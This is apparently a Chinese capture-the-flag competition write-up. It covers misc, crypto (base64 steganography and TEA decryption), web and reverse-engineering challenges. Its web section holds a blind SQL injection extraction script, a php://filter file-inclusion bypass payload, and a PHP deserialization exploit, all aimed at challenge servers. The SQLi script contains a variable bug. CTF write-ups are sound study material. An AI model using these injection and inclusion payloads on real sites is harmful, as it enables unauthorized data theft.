2020/08/20 08:34

# 签到

gif分解帧，再看不同色域通道。得到flag

# sudo

import numpy as np
from pwn import *
import time
def solve(m):
if isinstance(m, list):
m = np.array(m)
elif isinstance(m, str):
rg = np.arange(m.shape[0]+1)
while True:
mt = m.copy()
while True:
d = []
d_len = []
for i in range(m.shape[0]):
for j in range(m.shape[1]):
if mt[i, j] == 0:
possibles = np.setdiff1d(rg, np.union1d(np.union1d(mt[i, :], mt[:, j]), mt[3*(i//3):3*(i//3+1), 3*(j//3):3*(j//3+1)]))
d.append([i, j, possibles])
d_len.append(len(possibles))
if len(d) == 0:
break
idx = np.argmin(d_len)
i, j, p = d[idx]
if len(p) > 0:
num = np.random.choice(p)
else:
break
mt[i, j] = num
if len(d) == 0:
break
if np.all(mt != 0):
break

print("\nTrail:\n", mt)
return mt
def lllllll():
str1=p.recvline()
str1+=p.recvline()
str1+=p.recvline()
str1+=p.recvline()
str1+=p.recvline()
str1+=p.recvline()
str1+=p.recvline()
str1+=p.recvline()
str1+=p.recvline()
p.recvline()
p.recvline()
print(str1)
dataline = []
data = str1.split("\n")
# print(data)
for a in data:
pp = a.split(" ")
# print(pp)
pp.remove('')
#print(pp)
if (pp != []):
for i in range(0, 9):
if (pp[i] == '#'):
#print(pp[i])
pp[i] = '0'
pp[i] = int(pp[i])
# print(pp)
dataline.append(pp)
print(dataline)

result=solve(dataline)
s=''
#solve = solve.tostring()
for i in range(0,9):
for j in range(0,9):
s+=str(int(result[i][j]))
#print(solve[i][j]),
print(s)
p.sendline(s)
str1=''
time.sleep(3)

if __name__ == "__main__":
p=remote("47.93.204.245","12000")
i=0
while(i<3):
lllllll()
i+=1
p.interactive()


# 熟悉的解密

base64隐写和tea算法

import re

path = './1.txt'
b64char = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
with open(path, 'r')as f:
cipher = [i.strip() for i in f.readlines()]
plaintext = ''
for i in cipher:
if i[-2] == '=':  # There are 4-bit hidden info while end with two '='
bin_message = bin(b64char.index(i[-3]))[2:].zfill(4)
plaintext += bin_message[-4:]
elif i[-1] == '=':  # There are 2-bit hidden info while end with one '='
bin_message = bin(b64char.index(i[-2]))[2:].zfill(2)
plaintext += bin_message[-2:]
plaintext = re.findall('.{8}', plaintext)  # 8bits/group
plaintext = ''.join([chr(int(i,2)) for i in plaintext])
print plaintext

#include <stdio.h>
#include <stdint.h>

//加密函数
void encrypt(uint32_t* v, uint32_t* k) {
uint32_t v0 = v[0], v1 = v[1], sum = 0, i;           /* set up */
uint32_t delta = 0x9e3779b9;                     /* a key schedule constant */
uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];   /* cache key */
for (i = 0; i < 32; i++) {                       /* basic cycle start */
sum += delta;
v0 += ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
v1 += ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
}                                              /* end cycle */
v[0] = v0; v[1] = v1;
}
//解密函数
void decrypt(uint32_t* v, uint32_t* k) {
uint32_t v0 = v[0], v1 = v[1], sum = 0xC6EF3720, i;  /* set up */
uint32_t delta = 0x9e3779b9;                     /* a key schedule constant */
uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];   /* cache key */
for (i = 0; i < 32; i++) {                         /* basic cycle start */
v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
sum -= delta;
}                                              /* end cycle */
v[0] = v0; v[1] = v1;
}

int main()
{
//#cipher = [[4018289233L, 2950320151L],
//[1771827478L, 493980876L], [1863284879L, 1137797599L],
//[2759701525L, 3957885055L], [2600866805L, 78850724L]]
uint32_t v[2] = { 4018289233,2950320151},  //这里要两对两对的做
k[4] = { 11,22,33,44 };
decrypt(v, k);
// v为要加密的数据是两个32位无符号整数
// k为加密解密密钥，为4个32位无符号整数，即密钥长度为128位
printf("解密后的数据：%x%x\n", v[0], v[1]);
return 0;
}


# WEB部分

## easiestSQLI

import requests
import string
import re
r = requests.session()
url = 'http://eci-2ze2wcynh47kqz8clurh.cloudeci1.ichunqiu.com//?id=(mid((select(flag)from(flag)),{0},1)=char({1}))'
strings = string.printable
for i in range(42):
k = i + 1
for c in strings:
res = r.get(url.format(k,ord(j)))
if re.findall(r'YES~',res.content.decode()):
print(c,end='')
break


## 文件包含绕过

?filename=php://filter/convert.iconv.faUCS-2LE.UCS-2BE/resource=flag.php

## Soitgoes

<?php
class Seri{
public $alize; public function __construct($alize) {
$this->alize =$alize;
}
public function __destruct(){
$this->alize->getFlag(); } } class Flag{ public$f;
public $t1; public$t2;

function __construct($file){ echo "Another construction!!";$this->f = $file;$this->t1 = $this->t2 = md5(rand(1,10000)); } public function getFlag(){$this->t2 = md5(rand(1,10000));
echo $this->t1; echo$this->t2;
if($this->t1 ===$this->t2)
{
if(isset($this->f)){ echo @highlight_file($this->f,true);
}
}
}
}
$b=new Flag('flag.php');$b->t1=&$b->t2;$a=new Seri($b); echo(serialize($a));
?>


## inclusion

file_put_contents('res',print_r(\$_SERVER,true));


# 逆向

RE是些什么神仙题啊

js那个好像是KCTF的原题　已经恢复OPCODE了但是时间不够了，还有一个是迷宫问题？

system.out.println打印出的结果也是加密的

9SKj8BfvJD5PcdH+Rh7TIbXwgpC/Nntiq62rWUEaAzQ3ZyVFG4mLoY0l1xOeMkus

00235CFPaeefijlmnrwz

020C5PaeeFlmnjzwrif3

3020fF5CeaPeirjnmlwz

quickjs 那题已经参考KCTF那题还原opcode了 没时间了 QAQ

0
0 收藏

0 评论
0 收藏
0